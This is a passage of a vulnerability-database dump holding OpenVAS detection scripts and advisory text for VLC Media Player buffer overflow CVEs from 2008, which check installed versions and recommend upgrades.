Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-19 16:52:57 +0100 (Wed, 19 Nov 2008)\");\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\");\n script_name(\"FreeBSD Ports: vlc\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"vlc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.6.i_2,2\")<0) {\n txt += 'Package vlc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"vlc-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.9.6,3\")<0) {\n txt += 'Package vlc-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:18", "bulletinFamily": "scanner", "description": "This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.", "modified": "2017-02-01T00:00:00", "published": "2008-11-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800133", "id": "OPENVAS:800133", "title": "VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_media_player_mult_bof_vuln_nov08_lin.nasl 5158 2017-02-01 14:53:04Z mime $\n#\n# VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Linux)\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Upgrade to 0.9.6, or\n Apply the available patch from below link,\n http://git.videolan.org/?p=vlc.git;a=commitdiff;h=e3cef651125701a2e33a8d75b815b3e39681a447\n http://git.videolan.org/?p=vlc.git;a=commitdiff;h=5f63f1562d43f32331006c2c1a61742de031b84d\n\n *****\n NOTE: Ignore this warning if above mentioned patch is already applied.\n *****\";\n\ntag_impact = \"Successful exploitation allows attackers to execute arbitrary code\n within the context of the VLC media player by tricking a user into opening\n a specially crafted file or can even crash an affected application.\n Impact Level: Application\";\ntag_affected = \"VLC media player 0.5.0 through 0.9.5 on Windows (Any).\";\ntag_insight = \"The flaws are caused while parsing,\n - header of an invalid CUE image file related to modules/access/vcd/cdrom.c.\n - an invalid RealText(rt) subtitle file related to the ParseRealText function\n in modules/demux/subtitle.c.\";\ntag_summary = \"This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.\";\n\nif(description)\n{\n script_id(800133);\n script_version(\"$Revision: 5158 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-01 15:53:04 +0100 (Wed, 01 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-14 10:43:16 +0100 (Fri, 14 Nov 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\");\n script_bugtraq_id(32125);\n script_name(\"VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Linux)\");\n\n script_xref(name : \"URL\" , value : \"http://www.videolan.org/security/sa0810.html\");\n script_xref(name : \"URL\" , value : \"http://www.trapkit.de/advisories/TKADV2008-011.txt\");\n script_xref(name : \"URL\" , value : \"http://www.trapkit.de/advisories/TKADV2008-012.txt\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_mandatory_keys(\"login/SSH/success\");\n script_dependencies(\"gather-package-list.nasl\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"ssh_func.inc\");\ninclude(\"version_func.inc\");\n\nsock = ssh_login_or_reuse_connection();\nif(!sock){\n exit(0);\n}\n\nvlcBinPath = find_bin(prog_name:\"vlc\", sock:sock);\nforeach binPath (vlcBinPath)\n{\n if( chomp(binPath) == \"\" ) continue;\n vlcVer = get_bin_version(full_prog_name:chomp(binPath), version_argv:\"--version\",\n ver_pattern:\"ersion ([0-9.]+[a-z]?)\", sock:sock);\n if( ! isnull( vlcVer[1] ) )\n {\n # Check for VLC Media Player Version 0.5.0 - 0.9.5\n if(version_in_range(version:vlcVer[1], test_version:\"0.5.0\", test_version2:\"0.9.5\")){\n security_message(0);\n }\n ssh_close_connection();\n exit(0);\n }\n}\nssh_close_connection();\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-30T21:33:48", "bulletinFamily": "scanner", "description": "This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.", "modified": "2018-11-30T00:00:00", "published": "2008-11-14T00:00:00", "id": "OPENVAS:1361412562310800132", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800132", "title": "VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_media_player_mult_bof_vuln_nov08_win.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Windows)\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800132\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-14 10:43:16 +0100 (Fri, 14 Nov 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\");\n script_bugtraq_id(32125);\n script_name(\"VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Windows)\");\n\n script_xref(name:\"URL\", value:\"http://www.videolan.org/security/sa0810.html\");\n script_xref(name:\"URL\", value:\"http://www.trapkit.de/advisories/TKADV2008-011.txt\");\n script_xref(name:\"URL\", value:\"http://www.trapkit.de/advisories/TKADV2008-012.txt\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to execute arbitrary code\n within the context of the VLC media player by tricking a user into opening\n a specially crafted file or can even crash an affected application.\");\n\n script_tag(name:\"affected\", value:\"VLC media player 0.5.0 through 0.9.5 on Windows (Any).\");\n\n script_tag(name:\"insight\", value:\"The flaws are caused while parsing,\n\n - header of an invalid CUE image file related to modules/access/vcd/cdrom.c.\n\n - an invalid RealText(rt) subtitle file related to the ParseRealText function\n in modules/demux/subtitle.c.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 0.9.6 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://git.videolan.org/?p=vlc.git;a=commitdiff;h=e3cef651125701a2e33a8d75b815b3e39681a447\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nvlcVer = registry_get_sz(item:\"Version\", key:\"SOFTWARE\\VideoLAN\\VLC\");\nif(!vlcVer){\n exit(0);\n}\n\nif(version_in_range(version:vlcVer, test_version:\"0.5.0\", test_version2:\"0.9.5\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:24", "bulletinFamily": "scanner", "description": "This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.", "modified": "2017-02-20T00:00:00", "published": "2008-11-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800132", "id": "OPENVAS:800132", "title": "VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_media_player_mult_bof_vuln_nov08_win.nasl 5370 2017-02-20 15:24:26Z cfi $\n#\n# VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Windows)\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Upgrade to 0.9.6, or\n Apply the available patch from below link,\n http://git.videolan.org/?p=vlc.git;a=commitdiff;h=e3cef651125701a2e33a8d75b815b3e39681a447\n http://git.videolan.org/?p=vlc.git;a=commitdiff;h=5f63f1562d43f32331006c2c1a61742de031b84d\n\n *****\n NOTE: Ignore this warning if above mentioned patch is already applied.\n *****\";\n\ntag_impact = \"Successful exploitation allows attackers to execute arbitrary code\n within the context of the VLC media player by tricking a user into opening\n a specially crafted file or can even crash an affected application.\n Impact Level: Application\";\ntag_affected = \"VLC media player 0.5.0 through 0.9.5 on Windows (Any).\";\ntag_insight = \"The flaws are caused while parsing,\n - header of an invalid CUE image file related to modules/access/vcd/cdrom.c.\n - an invalid RealText(rt) subtitle file related to the ParseRealText function\n in modules/demux/subtitle.c.\";\ntag_summary = \"This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.\";\n\nif(description)\n{\n script_id(800132);\n script_version(\"$Revision: 5370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 16:24:26 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-14 10:43:16 +0100 (Fri, 14 Nov 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\");\n script_bugtraq_id(32125);\n script_name(\"VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Windows)\");\n\n script_xref(name : \"URL\" , value : \"http://www.videolan.org/security/sa0810.html\");\n script_xref(name : \"URL\" , value : \"http://www.trapkit.de/advisories/TKADV2008-011.txt\");\n script_xref(name : \"URL\" , value : \"http://www.trapkit.de/advisories/TKADV2008-012.txt\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nvlcVer = registry_get_sz(item:\"Version\", key:\"SOFTWARE\\VideoLAN\\VLC\");\nif(!vlcVer){\n exit(0);\n}\n\n# Check for VLC Media Player Version 0.5.0 to 0.9.5\nif(version_in_range(version:vlcVer, test_version:\"0.5.0\", test_version2:\"0.9.5\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-06T13:44:38", "bulletinFamily": "scanner", "description": "This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.", "modified": "2018-12-05T00:00:00", "published": "2008-11-14T00:00:00", "id": "OPENVAS:1361412562310800133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800133", "title": "VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_media_player_mult_bof_vuln_nov08_lin.nasl 12666 2018-12-05 12:36:06Z cfischer $\n#\n# VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Linux)\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800133\");\n script_version(\"$Revision: 12666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-05 13:36:06 +0100 (Wed, 05 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-14 10:43:16 +0100 (Fri, 14 Nov 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\");\n script_bugtraq_id(32125);\n script_name(\"VLC Media Player Multiple Stack-Based BOF Vulnerabilities - Nov08 (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_vlc_media_player_detect_lin.nasl\");\n script_mandatory_keys(\"VLCPlayer/Lin/Ver\");\n\n script_xref(name:\"URL\", value:\"http://www.videolan.org/security/sa0810.html\");\n script_xref(name:\"URL\", value:\"http://www.trapkit.de/advisories/TKADV2008-011.txt\");\n script_xref(name:\"URL\", value:\"http://www.trapkit.de/advisories/TKADV2008-012.txt\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to execute arbitrary code\n within the context of the VLC media player by tricking a user into opening\n a specially crafted file or can even crash an affected application.\");\n\n script_tag(name:\"affected\", value:\"VLC media player 0.5.0 through 0.9.5 on Windows (Any).\");\n\n script_tag(name:\"insight\", value:\"The flaws are caused while parsing,\n\n - header of an invalid CUE image file related to modules/access/vcd/cdrom.c.\n\n - an invalid RealText(rt) subtitle file related to the ParseRealText function\n in modules/demux/subtitle.c.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to\n Multiple Stack-Based Buffer Overflow Vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 0.9.6.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version:vers, test_version:\"0.5.0\", test_version2:\"0.9.5\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"0.9.6\", install_path:path );\n security_message( port:0, data:report );\n}\n\nexit( 0 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200812-24.", "modified": "2017-07-07T00:00:00", "published": "2008-12-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63069", "id": "OPENVAS:63069", "title": "Gentoo Security Advisory GLSA 200812-24 (vlc)", "type": "openvas", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in VLC may lead to the remote execution of\narbitrary code.\";\ntag_solution = \"All VLC users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/vlc-0.9.8a'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200812-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=245774\nhttp://bugs.gentoo.org/show_bug.cgi?id=249391\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200812-24.\";\n\n \n \n\nif(description)\n{\n script_id(63069);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-29 22:42:24 +0100 (Mon, 29 Dec 2008)\");\n script_cve_id(\"CVE-2008-5032\", \"CVE-2008-5036\", \"CVE-2008-5276\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200812-24 (vlc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-video/vlc\", unaffected: make_list(\"ge 0.9.8a\"), vulnerable: make_list(\"lt 0.9.8a\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 1819-1.", "modified": "2018-04-06T00:00:00", "published": "2009-06-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064255", "id": "OPENVAS:136141256231064255", "title": "Debian Security Advisory DSA 1819-1 (vlc)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1819_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1819-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in vlc, a multimedia player\nand streamer. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-1768\n\nDrew Yao discovered that multiple integer overflows in the MP4 demuxer,\nReal demuxer and Cinepak codec can lead to the execution of arbitrary\ncode.\n\nCVE-2008-1769\n\nDrew Yao discovered that the Cinepak codec is prone to a memory\ncorruption, which can be triggered by a crafted Cinepak file.\n\nCVE-2008-1881\n\nLuigi Auriemma discovered that it is possible to execute arbitrary code\nvia a long subtitle in an SSA file.\n\nCVE-2008-2147\n\nIt was discovered that vlc is prone to a search path vulnerability,\nwhich allows local users to perform privilege escalations.\n\nCVE-2008-2430\n\nAlin Rad Pop discovered that it is possible to execute arbitrary code\nwhen opening a WAV file containing a large fmt chunk.\n\nCVE-2008-3794\n\nPnar Yanarda discovered that it is possible to execute arbitrary code\nwhen opening a crafted mmst link.\n\nCVE-2008-4686\n\nTobias Klein discovered that it is possible to execute arbitrary code\nwhen opening a crafted .ty file.\n\nCVE-2008-5032\n\nTobias Klein discovered that it is possible to execute arbitrary code\nwhen opening an invalid CUE image file with a crafted header.\n\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 0.8.6-svn20061012.debian-5.1+etch3.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.8.6.h-4+lenny2, which was already included in the lenny\nrelease.\n\nFor the testing distribution (squeeze) and the unstable distribution\n(sid), these problems have been fixed in version 0.8.6.h-5.\n\n\nWe recommend that you upgrade your vlc packages.\";\ntag_summary = \"The remote host is missing an update to vlc\nannounced via advisory DSA 1819-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201819-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64255\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-23 15:49:15 +0200 (Tue, 23 Jun 2009)\");\n script_cve_id(\"CVE-2008-1768\", \"CVE-2008-1769\", \"CVE-2008-1881\", \"CVE-2008-2147\", \"CVE-2008-2430\", \"CVE-2008-3794\", \"CVE-2008-4686\", \"CVE-2008-5032\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1819-1 (vlc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wxvlc\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-alsa\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-esd\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-arts\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc0\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc0-dev\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-glide\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 